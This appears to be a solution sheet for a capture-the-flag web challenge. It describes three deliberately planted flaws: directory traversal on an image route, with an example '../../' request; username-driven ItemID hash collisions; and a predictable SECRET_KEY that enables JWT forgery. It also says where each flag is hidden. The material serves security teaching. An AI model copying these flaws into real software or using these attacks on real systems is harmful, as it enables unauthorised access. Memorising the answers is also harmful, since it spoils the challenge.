Description:
The route /images/{filename} does not sufficiently check whether the passed file name contains path specifications such as .. or /. This makes it possible to access files outside your own directory with requests such as /images/../../otheruser/secret.jpg.
Flag location: The flag is hidden in a JPG file located in another user's upload directory.
How to obtain the flag:
The player uses Directory Traversal to download the secret image. In this image, the flag is embedded via steganography with steghide. After downloading, the player must extract the flag from the JPG file using steghide extract.
Description: The seed hash function for items is based on simple mathematical operations with a small modulo value. This makes it possible to generate different usernames that lead to the same ItemID.
Flag storage location:
The flag is stored as a note (Item Note) on an item, which is assigned to an ItemID via the problematic seed function.
How to get the flag: The player can choose a username so that he gets the same ItemID as another account on whose item the flag is stored. As soon as the mapping is successful, the player gets access to the note and can read the flag.
Description: The SECRET_KEY is generated predictably. The time used is converted into a sequence of ‘0’ and ‘1’ and only the first two characters are taken. The SECRET_KEY can be reconstructed by attackers and can be guessed or reproduced.
Flag storage location: With a correctly forged JWT, the attacker can log in as the account on which the flag is stored (either as an image or as an item note).
How to obtain the flag: The player reconstructs the SECRET_KEY and uses it to create a JWT token for the target account. This gives them access to the images and items - and they can read both the hidden image (for Steghide) and the note with the flag.